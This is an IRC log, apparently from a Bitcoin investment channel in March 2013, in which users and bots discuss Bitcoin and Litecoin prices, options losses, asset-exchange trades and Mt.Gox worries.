PT prices Mar 30 19:10:58 the original source is still a few % lower than PT price Mar 30 19:10:59 temporal Mar 30 19:13:24 With a lot of headecks, we managed to put together another site from wich you can buy Amazon Gift Cards with Bitcoins. You no longer need an account, it’s much simpler to use now. We received a lot of complaints that user accounts are not necessary so we removed them. We are still a bit rugged, but donations are open so you can donate (if you want to) so we can improve the site. The new site is at: http://amazonbitco Mar 30 19:13:51 mircea_popescu: it seems you win again ;) I would say, all and all for a month that is a beating, you have come out relatively unscathed... Mar 30 19:14:06 fail spam Mar 30 19:14:45 lol wtf is with people. Mar 30 19:14:57 why can't he participate in the chan like normal human beings. Mar 30 19:15:10 what are headecks? Mar 30 19:15:51 something like tinfoil hats, just for stupidity? Mar 30 19:16:33 landing pads for space cadets Mar 30 19:17:41 https://bitcointalk.org/index.php?topic=101902.msg1705462#msg1705462 Mar 30 19:17:57 hints of hints of news Mar 30 19:18:57 his previous post is also interesting Mar 30 19:19:08 not US resident anymore Mar 30 19:19:28 yep Mar 30 19:19:41 although i think that has been a rumour for a bit Mar 30 19:23:19 and it will be even harder now Mar 30 19:23:19 with BTC deflation Mar 30 19:23:29 I thought BTC wont go through deflation period until almost mined up Mar 30 19:23:45 maybe i dont understand the context..but.. Mar 30 19:24:48 from what I understand about economics, like inflation deflation is not necessarily good Mar 30 19:25:18 http://trilema.com/2013/options-and-leverage-a-case-study/ Mar 30 19:25:27 just calculated the implicit leverage for march. Mar 30 19:25:30 5.02x Mar 30 19:25:50 so this is a good case of deflation Mar 30 19:26:11 ok Mar 30 19:26:15 alternative idea for channel bannings: offer ignore bounties, pay .001 to anyone that ignored the desired person, if you are caught responding to that troll you pay .1 penalty, profits go to assbot dev Mar 30 19:26:15 KRS1 bitcoin inflation is about 8% pa atm Mar 30 19:26:23 sorta like a swear jar? Mar 30 19:26:35 How do you get that figure mircea popescu Mar 30 19:27:04 thats low as far as im understanding it and not bad either Mar 30 19:27:05 KRS1 25 btc x 6 blocks x 24 hours in a day Mar 30 19:27:15 compare to the total btc in circulation Mar 30 19:27:19 ic Mar 30 19:27:31 annualize somehow Mar 30 19:27:32 these are all good indicators i think Mar 30 19:27:44 (the exact way is left as an exercise to the user, seeing how depending on how you do it you get diff results) Mar 30 19:29:06 ok thank you guys- Mar 30 19:36:47 CoinBr.MPBPT-O paid out, 0.07679501 BTC per share (nominal value 0.1 BTC) Mar 30 19:45:09 [BTCTC] [ASICMINER-PT] 2 @ 0.795 = 1.59 BTC [+] Mar 30 19:45:15 [BTCTC] [ASICMINER-PT] 4 @ 0.7999 = 3.1996 BTC [+] Mar 30 19:49:18 ;;ticker Mar 30 19:49:19 BTCUSD ticker | Best bid: 90.80001, Best ask: 90.98999, Bid-ask spread: 0.18998, Last trade: 90.98999, 24 hour volume: 49893.62640319, 24 hour low: 85.50000, 24 hour high: 94.98000, 24 hour vwap: 90.70184 Mar 30 19:51:41 still not 100 Mar 30 19:52:50 prolly not going to be over easter holiday weekend Mar 30 19:53:22 gotta wait for the snail banks to open again to get more fresh buying funds into the market Mar 30 19:53:52 that's a point Mar 30 19:55:05 surpised it's not moving down really Mar 30 19:55:12 ;;bids 85 Mar 30 19:55:14 There are currently 16264.821 bitcoins demanded at or over 85.0 USD, worth 1422076.42737 USD in total. | Data vintage: 0.0064 seconds Mar 30 19:55:16 looks like maybe litecoin is the one that's rockin to new highs these days Mar 30 19:55:19 ;;bids 88 Mar 30 19:55:20 There are currently 6698.9219 bitcoins demanded at or over 88.0 USD, worth 596157.374234 USD in total. | Data vintage: 5.3952 seconds Mar 30 19:55:35 ;;asks 96 Mar 30 19:55:36 There are currently 11822.091 bitcoins offered at or under 96.0 USD, worth 1113104.50621 USD in total. | Data vintage: 21.2181 seconds Mar 30 19:55:47 ;;asks 93 Mar 30 19:55:48 There are currently 3311.6116 bitcoins offered at or under 93.0 USD, worth 306592.030934 USD in total. | Data vintage: 33.4255 seconds Mar 30 19:55:56 heh Mar 30 19:56:14 maybe litecoin will cross $1 before bitcoin crosses $100 Mar 30 19:56:35 maybe Mar 30 20:02:28 i fail to grok how litecoin can be worth 1 Mar 30 20:03:32 [MPEX] [S.MPOE] 971 @ 0.00067327 = 0.6537 BTC [-] Mar 30 20:03:34 well it's worth $0.81 right now ... Mar 30 20:03:58 i'd managed to ignore it all all other *coins until now, Mar 30 20:04:11 but this month it has gotten my attention Mar 30 20:06:01 all in all I'd have been better off not dabbling in LTC at all, other than that it introduced me to Deprived, who's pretty interesting Mar 30 20:06:06 [HAVELOCK] [HIM] 1 @ 1.94999999 BTC [+] Mar 30 20:06:07 [HAVELOCK] [HIM] 2 @ 1.97999999 = 3.96 BTC [+] Mar 30 20:06:09 [HAVELOCK] [HIM] 1 @ 1.98 BTC [+] Mar 30 20:06:10 [HAVELOCK] [HIM] 1 @ 1.99999999 BTC [+] Mar 30 20:06:24 OH SNAP HIM Mar 30 20:06:27 I KNEW IT Mar 30 20:06:28 ThickAsThieves why would you be better off Mar 30 20:06:28 MWAHAHAHAHA Mar 30 20:07:22 i bought some on like the 5th Mar 30 20:07:28 but then sold it off. apparently i sold too soon Mar 30 20:07:30 but srsly wtf. Mar 30 20:07:40 yeah i played the game too Mar 30 20:07:50 made 100% in 3 days or so and never looked back Mar 30 20:07:59 yeah. something of the sort. Mar 30 20:08:09 but i certainly didn't get out at the top. wtf lol Mar 30 20:08:16 well, my investment thesis is something like the following: Mar 30 20:08:34 i was riding 0.07 to 0.15 Mar 30 20:08:36 i've always followed pretty closely the effect of difficulty on bitcoin prices, Mar 30 20:08:52 and now with ASICs moving that to the moon, Mar 30 20:09:06 hah Mar 30 20:09:12 the feeling is that a lot of the GPU mining farms will drop out and start mining litecoin, Mar 30 20:09:19 toffoo so ? Mar 30 20:09:27 which will cause it's difficulty to start rising, Mar 30 20:09:27 it still is useless Mar 30 20:09:30 which it has, Mar 30 20:09:44 and therefore market prices are following Mar 30 20:09:51 well you can invest in eskimo bobs ART and thats about it Mar 30 20:09:51 hum Mar 30 20:10:20 kakobrekla o totally forgot. how's the clay business i wonder Mar 30 20:10:21 hes gonna be klin millioanare Mar 30 20:10:22 try to find a chart of litecoin difficulty the past few weeks Mar 30 20:10:38 you mean klim ? Mar 30 20:10:44 basically, i started to learn the price manipulation patterns in BTC-e for LTC, Mar 30 20:10:48 and joined them Mar 30 20:10:50 did fine Mar 30 20:11:05 then BTC blew up a bajillion % higher Mar 30 20:11:12 and i was holding the bag Mar 30 20:11:16 aww Mar 30 20:11:34 i'd kinda short ltc at 1 dollar each Mar 30 20:11:44 about a 12btc haircut for me that day Mar 30 20:11:44 i ment kiln Mar 30 20:12:02 for pottery? Mar 30 20:12:04 nvm Mar 30 20:12:08 lolk Mar 30 20:12:12 but i covered a bit by sniping underpriced assets at ltcglobal Mar 30 20:12:27 i even got props from Deprived for a couple of my moves :) Mar 30 20:12:42 haha cool Mar 30 20:13:01 [MPEX] [S.DICE] 430 @ 0.003512 = 1.5102 BTC [-] Mar 30 20:13:29 you know in retrospect... that s.dice ipo price was judicious Mar 30 20:13:38 [MPEX] [S.MPOE] 3000 @ 0.00066871 = 2.0061 BTC [-] Mar 30 20:15:12 [BTCTC] [S.DICE-PT] 36 @ 0.005455 = 0.1964 BTC [+] Mar 30 20:16:47 wait what ?! Mar 30 20:16:53 !ticker btctc s.dice-pt Mar 30 20:16:56 [BTCT:S.DICE-PT] 1D: 0.00459 / 0.00521 / 0.005455 (81 shares, 0.4 BTC), 7D: 0.00366 / 0.00452 / 0.0055 (4499 shares, 20.3 BTC), 30D: 0.00361 / 0.00525 / 0.00643 (30048 shares, 157.8 BTC) Mar 30 20:17:10 there's a 70% gap ?! Mar 30 20:19:11 but whole order book is 13btc bids, 18btc asks... not worth bugging deadterra about Mar 30 20:19:44 thats Nam's Mar 30 20:19:47 not DT's Mar 30 20:19:52 oh Mar 30 20:19:56 nvm Mar 30 20:20:06 you meant to arb Mar 30 20:20:32 no Mar 30 20:20:33 haha i see now... and GSDPT is copletely elsewhere Mar 30 20:20:39 70% of 13 btc is like 100 bux lol Mar 30 20:20:56 the same exchange, yet one would need to engage two ops to arbitrage Mar 30 20:20:57 1000 Mar 30 20:21:08 why they just can't list one pt together Mar 30 20:21:14 i like multiple Mar 30 20:21:21 why? Mar 30 20:21:25 for lulz? Mar 30 20:21:30 somebody should plot the various pt price vs mpex one day Mar 30 20:21:35 it'd make one hell of a grap Mar 30 20:21:37 well in the case of Nam's Mar 30 20:21:43 it's not successful enough Mar 30 20:21:57 to provide a lot of arb Mar 30 20:22:14 but in the end there has alway been variance between each PT Mar 30 20:22:20 enough to arb Mar 30 20:22:27 i'm sold out of Nam's though Mar 30 20:22:32 because it got a premium Mar 30 20:22:37 from low uptake Mar 30 20:22:49 now not enough people in it Mar 30 20:23:25 [MPEX] [S.MPOE] 2239 @ 0.00066871 = 1.4972 BTC [-] Mar 30 20:23:27 [MPEX] [S.MPOE] 4122 @ 0.00066869 = 2.7563 BTC [-] Mar 30 20:23:28 [MPEX] [S.MPOE] 239 @ 0.00066868 = 0.1598 BTC [-] Mar 30 20:34:06 toffoo, I have reasoned the same about LTC Mar 30 20:36:14 http://bitcoinity.org/assets/fail.jpg YES! Mar 30 20:42:57 have you looked to past performance? not every month is his exposure needed. Mar 30 20:44:03 and if btc goes up twice again next month, some 20% loss wouldn't be so tragic Mar 30 20:44:35 well. so there will be no options. that is the point. Mar 30 20:44:46 happened already, no prob Mar 30 20:44:51 ;;bids 0 Mar 30 20:44:51 There are currently 34833411 bitcoins demanded at or over 0.0 USD, worth 10285047.2026 USD in total. | Data vintage: 55.2628 seconds Mar 30 20:51:18 That's more bitcoins than exist... Mar 30 20:51:20 LOL Mar 30 20:51:42 tiberiusiv: is an irate bondholder! Mar 30 20:51:51 pleaes direct all complaints to Bugpowder Mar 30 20:52:17 and you are? Mar 30 20:52:35 SO MR. tiberiusiv you know everything? Mar 30 20:52:46 you know what the Oracle says about men who say they know everything Mar 30 20:53:10 HAHAHAHAHAHAHAHA Mar 30 20:53:12 they are Mar 30 20:53:25 You don't read enough. Mar 30 21:01:10 what would your preferred implementation be, tiberiusiv? Mar 30 21:04:08 tib, by selling bonds he's already letting people underwrite the options Mar 30 21:04:44 he's considers it an investment Mar 30 21:04:49 he Mar 30 21:06:19 you dont think that him losing XXXXX btc is a test of his risk management? Mar 30 21:06:27 he's not betting Mar 30 21:06:40 maybe he's trying to create a market Mar 30 21:06:53 of a new order of magnitude in size Mar 30 21:07:32 he spends 15k today, maybe makes 150k next year Mar 30 21:08:18 i'm done, you can beat on him all you want Mar 30 21:09:17 he has plenty Mar 30 21:09:25 to risk this investment Mar 30 21:13:58 [MPEX] [S.MPOE] 17450 @ 0.00066868 = 11.6685 BTC [-] Mar 30 21:14:17 sry tib, gotta turn you off for a while Mar 30 21:17:39 lol that's just some assertions, not truth Mar 30 21:23:39 [BTCTC] [GSDPT] 1 @ 0.00323 BTC [-] Mar 30 21:23:46 [BTCTC] [GSDPT] 282 @ 0.00323 = 0.9109 BTC [-] Mar 30 21:28:50 obv if you come to btc in a "i know shit" fashion you'll get burned Mar 30 21:29:34 i started trying options only after few months observations, went off well enough so far Mar 30 21:30:58 no, you're not payng attention, i do. with iDiffs. Mar 30 21:31:16 adn i do write mpoe options occassionally, too Mar 30 21:31:23 [MPEX] [S.MPOE] 5000 @ 0.00067326 = 3.3663 BTC [+] Mar 30 21:31:25 [MPEX] [S.MPOE] 11529 @ 0.00067327 = 7.7621 BTC [+] Mar 30 21:31:26 [MPEX] [S.MPOE] 543 @ 0.00067469 = 0.3664 BTC [+] Mar 30 21:31:42 wtf is ThickAsThieves even talking about Mar 30 21:33:04 Diablo-D3: perhaps you ignore tibby? Mar 30 21:33:23 I do Mar 30 21:33:25 the guy is a nutjob Mar 30 21:33:47 so, thick was chatting with him Mar 30 21:35:52 sauce? Mar 30 21:37:03 yeah Mar 30 21:37:13 the sad part is he made more than 95% too Mar 30 21:37:26 just coinbr-managed holdings are way more than whatever you're insinuating here. Mar 30 21:37:55 and i have no illusion that even all users combined it's one of smaller players here Mar 30 21:38:28 *all coinbr users together i mean Mar 30 21:39:39 sry diablo, i got sucked into th vortex, tib is back on ignore now Mar 30 21:40:01 what is he doing anyhow? Mar 30 21:40:03 sorry tibby, my insanity threshold is clearly lower than average, but you just crossed it Mar 30 21:40:12 mircea has lost in 1month probably more bitcoins then 95% of this channel hold combined. Mar 30 21:40:28 mircea doesnt have more than 1000 BTC so clearly false Mar 30 21:40:39 lol Mar 30 21:40:48 he lost it all on ltc Mar 30 21:40:55 ignored. Mar 30 21:41:09 yuss Mar 30 21:41:45 right. Mar 30 21:42:14 [MPEX] [S.MPOE] 3450 @ 0.00066869 = 2.307 BTC [-] Mar 30 21:42:42 tiberiusiv: keep talking you're making the stock shortable Mar 30 21:43:04 tiberiusiv just make sure you are on the other side of the stick and more welth to you no' Mar 30 21:43:13 i dunno why you complain Mar 30 21:43:36 stop troling already Mar 30 21:43:41 for srs Mar 30 21:43:53 its good for nothing Mar 30 21:47:13 [MPEX] [S.MPOE] 1574 @ 0.00066869 = 1.0525 BTC [-] Mar 30 21:47:14 [MPEX] [S.MPOE] 14726 @ 0.00066868 = 9.847 BTC [-] Mar 30 22:05:08 [MPEX] [O.USD.C200T] 200 @ 0.05079251 = 10.1585 BTC Mar 30 22:07:55 http://www.reddit.com/r/Bitcoin/comments/1bbgtr/this_is_how_serious_business_is_done_27k_loss/ Mar 30 22:08:04 ^^ let's see what will happen Mar 30 22:08:34 ima add 1mn btc buttons to mpex. Mar 30 22:09:00 lol jurov where did you find that "fu" pic of mine Mar 30 22:09:16 lmao reddit found it itself Mar 30 22:10:06 it's like... "smug. let me show you how it's done" Mar 30 22:12:43 is there a guide for options trading Mar 30 22:12:49 seems so confusing :/ Mar 30 22:13:15 https://bitcointalk.org/index.php?topic=67302.0 Mar 30 22:13:19 arij http://trilema.com/2013/options-and-leverage-a-case-study/ Mar 30 22:13:24 thank you Mar 30 22:13:26 click on the first link nm Mar 30 22:13:29 jurov is too fast Mar 30 22:13:33 heh Mar 30 22:13:52 heh i wonder where draco isd Mar 30 22:13:58 ;;seen draco49 Mar 30 22:13:58 I have not seen draco49. Mar 30 22:14:12 but the linked page from that thread is missing... since it's referenced much, maybe MPOE-PR can update it Mar 30 22:14:15 mircea still owes me trilema credits :( Mar 30 22:14:22 using MKOPT/SPLIT instead of email Mar 30 22:15:14 thestrin1puller how so ? Mar 30 22:15:22 jurov ya thaty's a point. Mar 30 22:15:25 old old thread. Mar 30 22:15:40 my ip changed a long time ago Mar 30 22:15:44 well not too long ago Mar 30 22:15:51 And now the paywall hates me Mar 30 22:15:57 aww! Mar 30 22:16:03 so get pw based credits Mar 30 22:16:26 [BTCTC] [GSDPT] 1 @ 0.00408 BTC [+] Mar 30 22:16:43 i know I should have Mar 30 22:16:44 waaaah Mar 30 22:16:45 waaah Mar 30 22:16:46 I'm sad Mar 30 22:16:47 lol Mar 30 22:16:52 it's cool mircea_popescu Mar 30 22:16:59 i respect you enough to warrant a loss ;) Mar 30 22:17:06 [HAVELOCK] [HIM] 2 @ 1.95 = 3.9 BTC [-] Mar 30 22:17:15 [BTCTC] [GSDPT] 1948 @ 0.00409 = 7.9673 BTC [+] Mar 30 22:18:41 Havelock is slowly becoming the berkshire hathaway of btc investments... Mar 30 22:18:51 mircea_popescu: you should creating a mining bond Mar 30 22:18:56 (this is where we all laugh) Mar 30 22:19:28 was going to reply "there was one already" Mar 30 22:21:01 jurov: that giga etf that went to shit? Mar 30 22:21:25 tiberiusiv: Havelock is a savings medium different space than the others Mar 30 22:21:40 yes, and there was a 1GH or so future.. going quickly down to 1 satoshi Mar 30 22:22:59 Man I want to invest in HIM Mar 30 22:22:59 thestrin1puller but i never mined Mar 30 22:23:06 :) Mar 30 22:23:24 ^- that is how I know mircea_popescu is legit Mar 30 22:23:49 you mean yesterday Mar 30 22:23:58 also tiberiusiv you know what the oracle says Mar 30 22:24:11 shouldn't you know? Mar 30 22:24:17 tiberiusiv: what's the next movement going to be Mar 30 22:24:22 tiberiusiv: what's the meaning of life? Mar 30 22:24:29 tiberiusiv: how do I make more coin back? Mar 30 22:25:00 ;;bids 0 Mar 30 22:25:00 There are currently 34845084 bitcoins demanded at or over 0.0 USD, worth 10289649.6484 USD in total. | Data vintage: 115.2992 seconds Mar 30 22:25:38 LOL Mar 30 22:25:48 Bugpowder is avoiding the angry mobs Mar 30 22:26:41 [MPEX] [O.USD.C116T] 1 @ 0.1536719 BTC Mar 30 22:30:27 [MPEX] [O.USD.C116T] 19 @ 0.1536719 = 2.9198 BTC Mar 30 22:31:06 [HAVELOCK] [VTX] 7 @ 0.4999 = 3.4993 BTC [+] Mar 30 22:31:07 [HAVELOCK] [VTX] 5 @ 0.5 = 2.5 BTC [+] Mar 30 22:40:32 I don't think anyone is mad at him? Mar 30 22:45:23 cant always win jeez Mar 30 22:45:38 if u put out you need to expect to lose too Mar 30 22:47:41 can anyone provide advice? I am hearing more about mtgox every day and even though i dont have a lot in there, i'd like to protect what i do have..i dont use redeemable codes..do I have to pull out of gox and go with another? Mar 30 22:48:02 i think all the news is around the codes but im not using em Mar 30 22:48:18 and they're moving to the canada deal forgot the name..coin something Mar 30 22:48:44 prob because of the US regulation now? idk maybe im talking out my ass Mar 30 22:54:29 anyone? Mar 30 22:56:45 KRS1 you you use it a wallet, definitely pull out by any means Mar 30 22:57:12 *if you use it as wallet Mar 30 22:57:40 and even if you daytrade, i'd recommend preemptively pulling before the coinlab deal goes into effect Mar 30 22:58:16 ok guise Mar 30 22:58:25 we now have Sentiment charts Mar 30 22:58:26 http://bitbet.us/bet/307/bfl-will-deliver-asic-devices-before-july-1st/ Mar 30 22:58:40 oh, nice Mar 30 22:58:50 :) Mar 30 23:05:34 KRS1 prolly best to look for gox alternatives Mar 30 23:06:11 pretty cool graphs Mar 30 23:34:05 jurov http://www.reddit.com/r/Bitcoin/comments/1bbgtr/this_is_how_serious_business_is_done_27k_loss/c95ddt2 Mar 30 23:34:09 it just dawned on him Mar 30 23:37:44 [MPEX] [S.MPOE] 1300 @ 0.00067465 = 0.877 BTC [+] Mar 30 23:37:46 [MPEX] [S.MPOE] 5000 @ 0.00067466 = 3.3733 BTC [+] Mar 30 23:37:49 [MPEX] [S.MPOE] 8700 @ 0.00067469 = 5.8698 BTC [+] Mar 30 23:43:41 [BTCTC] [ASICMINER-PT] 2 @ 0.78 = 1.56 BTC [-] Mar 30 23:48:41 so, slovak PM is to show on a trial started by ex-PM Mar 30 23:48:58 except that police nor anybody else know his address Mar 30 23:49:02 lmao Mar 30 23:52:24 bulletproof legal immunity Mar 30 23:56:47 address nullrooted Mar 30 23:59:25 oh and also his office is not accepting such mail Mar 31 00:00:16 "Warning: BFL has failed to deliver for >7 months. It could be a scam!" Mar 31 00:00:23 lol @forum ppl Mar 31 00:05:11 [BTCTC] [ASICMINER-PT] 1 @ 0.78 BTC [-] Mar 31 00:05:40 [BTCTC] [ASICMINER-PT] 10 @ 0.766 = 7.66 BTC [-] Mar 31 00:05:43 [BTCTC] [ASICMINER-PT] 8 @ 0.765 = 6.12 BTC [-] Mar 31 00:09:07 [HAVELOCK] [VTX] 7 @ 0.5 = 3.5 BTC [+] Mar 31 00:16:34 [BTCTC] [BASIC-MINING] 80 @ 0.38 = 30.4 BTC [+] Mar 31 00:18:11 [BTCTC] [RSM] 1 @ 0.0025 BTC [-] Mar 31 00:18:48 [BTCTC] [ASICMINER-PT] 1 @ 0.7995 BTC [+] Mar 31 00:18:51 [BTCTC] [ASICMINER-PT] 10 @ 0.7998 = 7.998 BTC [+] Mar 31 00:18:54 [BTCTC] [ASICMINER-PT] 4 @ 0.8 = 3.2 BTC [+] Mar 31 00:27:33 [MPEX] [S.MPOE] 2557 @ 0.00067469 = 1.7252 BTC [+] Mar 31 00:27:35 [MPEX] [S.MPOE] 2543 @ 0.00067746 = 1.7228 BTC [+] Mar 31 00:32:07 [HAVELOCK] [KCIM] 1 @ 1.000001 BTC [-] Mar 31 00:33:06 [HAVELOCK] [KCIM] 1 @ 1.000001 BTC [-] Mar 31 00:41:46 !ticker H HIM Mar 31 00:41:48 [HAVELOCK:HIM] 1D: 1.88000000 / 1.94066666 / 1.99999999 (15 shares, 29.10999996 BTC), 7D: 1.41000000 / 1.74020155 / 2.00000000 (194 shares, 337.59910099 BTC), 30D: 1.40000000 / 1.78175586 / 17.25000000 (726 shares, 1293.55475265 BTC) Mar 31 00:53:12 [MPEX] [S.DICE] 16 @ 0.0039999 = 0.064 BTC [+] Mar 31 00:55:07 [HAVELOCK] [SDICE] 11 @ 0.414 = 4.554 BTC [-] Mar 31 00:56:06 [HAVELOCK] [SDICE] 3 @ 0.41499998 = 1.245 BTC [+] Mar 31 01:09:08 !ticker Mar 31 01:09:09 Aren't those tins of tobacco right there behind you? Mar 31 01:10:55 many thanks to those in this channel who advised me about the exchange i was with..i have pulled out my money and my coins are now in my own wallet Mar 31 01:12:01 you are welcome. Mar 31 01:17:00 assbot always gives best advice Mar 31 01:17:41 !ticker m ^oix Mar 31 01:17:42 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: / 85.1711468 / 85.1711468 (126970 shares, 26,734.25 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 31 01:17:57 still only 85? Mar 31 01:18:23 jurov: mircea_popescu said it will take a few days to sync up due to the new mpsics Mar 31 01:20:08 [HAVELOCK] [SDICE] 3 @ 0.43 = 1.29 BTC [+] Mar 31 01:22:46 [MPEX] [S.MPOE] 2457 @ 0.00067746 = 1.6645 BTC [+] Mar 31 01:22:48 [MPEX] [S.MPOE] 3356 @ 0.00067753 = 2.2738 BTC [+] Mar 31 01:22:49 [MPEX] [S.MPOE] 7000 @ 0.00068059 = 4.7641 BTC [+] Mar 31 01:22:51 [MPEX] [S.MPOE] 6403 @ 0.0006806 = 4.3579 BTC [+] Mar 31 01:23:25 thx thestrin1puller. by my educated guess, it should be way beyond 110 Mar 31 01:25:03 I hope there isn't a huge sell off Mar 31 01:25:54 stringpuller huge sell off of what? the cherries company? Mar 31 01:26:01 crash by ineptitude is much more likely Mar 31 01:26:30 we haven't one yet Mar 31 01:26:31 nah, just an old fashioned bank run Mar 31 01:26:58 the miners only need 13-14 / coin to pay off debt Mar 31 01:26:59 [MPEX] [S.MPOE] 1300 @ 0.00066869 = 0.8693 BTC [-] Mar 31 01:27:01 [MPEX] [S.MPOE] 3104 @ 0.00066868 = 2.0756 BTC [-] Mar 31 01:27:12 yes but it will be caused by ineptitude initially, instead of someone dumping Mar 31 01:27:38 ^ my prediction (which i don't like at all) Mar 31 01:27:50 cuz ineptitude can't be hedged against Mar 31 01:28:26 but what will it crash to? Mar 31 01:28:30 that's the real question Mar 31 01:28:42 will it be people invested in it at 1000 and it drops to 100 Mar 31 01:30:39 in any case, value of any well built enterprise will soar. and i hope to be there. Mar 31 01:31:36 [BTCTC] [COGNITIVE] 1 @ 0.1563 BTC [-] Mar 31 01:35:37 [23:30] BFL 0: 45.0C | 17.83/17.52/14.58Gh/s | A:343 R:0 HW:0 U:180.16/m Mar 31 01:43:15 troc_: where is it form? Mar 31 01:43:47 #bitcoin reposted by luke-jr from a post to bitcoin talk Mar 31 01:43:58 I think it implies the bfl chip hashses no ? Mar 31 01:44:29 http://bitcointroll.org/index.php?topic=78192.msg1707177#msg1707177 Mar 31 01:44:49 is the source, I thought it was his own system, before he posted the link. Mar 31 01:49:58 okay, i'll believe once CoinBr.iDiff-O sales start picking up. maybe. Mar 31 01:52:38 ;;bc,stats Mar 31 01:52:41 Current Blocks: 228838 | Current Difficulty: 6695826.282596251 | Next Difficulty At Block: 229823 | Next Difficulty In: 985 blocks | Next Difficulty In About: 5 days, 12 hours, 4 minutes, and 1 second | Next Difficulty Estimate: 7387042.88845 | Estimated Percent Change: 10.3231 Mar 31 02:09:56 ;;bids 0 Mar 31 02:09:59 There are currently 34843224 bitcoins demanded at or over 0.0 USD, worth 10134084.4122 USD in total. | Data vintage: 0.0171 seconds Mar 31 02:11:08 [HAVELOCK] [VTX] 1 @ 0.549999 BTC [+] Mar 31 02:11:15 [MPEX] [S.MPOE] 7871 @ 0.00066868 = 5.2632 BTC [-] Mar 31 02:11:17 [MPEX] [S.MPOE] 734 @ 0.00066868 = 0.4908 BTC [-] Mar 31 02:34:30 !ticker h HIM Mar 31 02:34:33 [HAVELOCK:HIM] 1D: 1.88000000 / 1.9476923 / 1.99999999 (13 shares, 25.31999996 BTC), 7D: 1.41000000 / 1.73749532 / 2.00000000 (192 shares, 333.59910099 BTC), 30D: 1.40000000 / 1.76042035 / 2.00000000 (725 shares, 1276.30475265 BTC) Mar 31 02:34:36 ;;seen smickles Mar 31 02:34:36 smickles was last seen in #bitcoin-assets 22 hours, 28 minutes, and 7 seconds ago: oh, it just changed Mar 31 02:34:56 ;;asks 1000 Mar 31 02:34:56 There are currently 63973.816 bitcoins offered at or under 1000.0 USD, worth 10286477.9499 USD in total. | Data vintage: 13.4143 seconds Mar 31 02:35:09 [BTCTC] [S.DICE-PT] 75 @ 0.0044 = 0.33 BTC [-] Mar 31 02:35:11 [BTCTC] [S.DICE-PT] 1 @ 0.00432 BTC [-] Mar 31 02:35:17 !ticker m S.DICE Mar 31 02:35:19 [MPEX:S.DICE] 1D: 0.003512 / 0.00390436 / 0.0039999 (2196 shares, 8.57 BTC), 7D: 0.0031 / 0.00338792 / 0.0045 (677769 shares, 2,296.23 BTC), 30D: 0.00300001 / 0.0044567 / 0.00637777 (1648084 shares, 7,345.02 BTC) Mar 31 02:35:37 why is no one arbing S.DICE Mar 31 02:36:18 can someone explain how does mpex loose money? Mar 31 02:36:23 doesn't make any sense Mar 31 02:38:12 bit hub - I suspect s.dice revenue is x% of someone's fiat based paycheck. If the price of bitcoin skyrockets, then then number of btc going to s.dice goes down. Same thing with mope I suspect. Mar 31 02:38:42 [MPEX] [S.MPOE] 9717 @ 0.00066534 = 6.4651 BTC [-] Mar 31 02:38:42 looking for how to turn off spell checker... Mar 31 02:38:43 [MPEX] [S.MPOE] 1483 @ 0.00066395 = 0.9846 BTC [-] Mar 31 02:38:44 they lost money selling options exposure Mar 31 02:40:05 Does everything on mpex end up being a bitcoin denominated hedge against the price of bitcoin going up? Mar 31 02:53:46 [MPEX] [S.MPOE] 3056 @ 0.00066395 = 2.029 BTC [-] Mar 31 02:53:48 [MPEX] [S.MPOE] 5690 @ 0.00066394 = 3.7778 BTC [-] Mar 31 02:53:57 [MPEX] [S.MPOE] 5080 @ 0.00066269 = 3.3665 BTC [-] Mar 31 02:54:01 [MPEX] [S.MPOE] 25574 @ 0.00066268 = 16.9474 BTC [-] Mar 31 02:55:11 [BTCTC] [GSDPT] 5 @ 0.004112 = 0.0206 BTC [+] Mar 31 02:55:13 [BTCTC] [GSDPT] 5 @ 0.004114 = 0.0206 BTC [+] Mar 31 02:57:00 [BTCTC] [S.DICE-PT] 1 @ 0.00509 BTC [+] Mar 31 04:05:13 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Mar 31 04:07:02 [BTCTC] [PAJKA.BOND] 10 @ 0.1059 = 1.059 BTC [-] Mar 31 04:11:23 [MPEX] [S.MPOE] 18626 @ 0.00066268 = 12.3431 BTC [-] Mar 31 04:11:25 [MPEX] [S.MPOE] 2448 @ 0.00066251 = 1.6218 BTC [-] Mar 31 04:18:00 cole_albon seems improbable. mpoe does btc hedging, that need scales with btc and has little to do with anyone's paycheck. Mar 31 04:18:20 as long as there's X btc in circulation, cX will need to be hedged one way or another. Mar 31 04:21:14 a couple of months ago I fat fingered an entry to buy s.dice when i meant to buy mpoe. with the huge spreads, I couldn't justify fixing my mistake immediately. I still regret that decision daily. Mar 31 04:22:38 Bugpowder: the bondholders want their money back Mar 31 04:22:42 [BTCTC] [GSDPT] 98 @ 0.004114 = 0.4032 BTC [+] Mar 31 04:23:05 Aww Mar 31 04:23:08 cole_albon that's one fat finger ;/ Mar 31 04:24:50 I invoke rule 23, "he who owns the coins is he who can send them" Mar 31 04:25:02 o.o Mar 31 04:32:53 ;;bids 0 Mar 31 04:32:55 There are currently 34842318 bitcoins demanded at or over 0.0 USD, worth 10101444.2221 USD in total. | Data vintage: 0.0181 seconds Mar 31 04:33:08 [HAVELOCK] [HIM] 1 @ 2.08 BTC [+] Mar 31 04:38:41 http://polimedia.us/dtng/c/src/136468147938.jpg lmao Mar 31 04:38:43 this is going well Mar 31 05:14:36 how many entries? Mar 31 05:36:46 ;;seen smickles Mar 31 05:36:47 smickles was last seen in #bitcoin-assets 1 day, 0 hours, 30 minutes, and 17 seconds ago: oh, it just changed Mar 31 05:36:53 dang Mar 31 05:36:57 mister smickles Mar 31 05:47:10 [HAVELOCK] [VTX] 18 @ 0.549999 = 9.9 BTC [+] Mar 31 05:54:24 [MPEX] [S.MPOE] 9350 @ 0.00065945 = 6.1659 BTC [-] Mar 31 05:54:26 [MPEX] [S.MPOE] 3250 @ 0.00065889 = 2.1414 BTC [-] Mar 31 05:54:28 [MPEX] [S.MPOE] 9500 @ 0.00065493 = 6.2218 BTC [-] Mar 31 05:54:39 [MPEX] [S.MPOE] 6100 @ 0.00065318 = 3.9844 BTC [-] Mar 31 05:54:41 [MPEX] [S.MPOE] 3000 @ 0.00065316 = 1.9595 BTC [-] Mar 31 05:56:40 price is exhausting itself Mar 31 05:56:50 @btcusd Mar 31 06:03:10 [MPEX] [S.MPOE] 9695 @ 0.00066535 = 6.4506 BTC [+] Mar 31 06:03:11 [MPEX] [S.MPOE] 2860 @ 0.00066562 = 1.9037 BTC [+] Mar 31 06:03:23 [MPEX] [S.MPOE] 2550 @ 0.00067021 = 1.709 BTC [+] 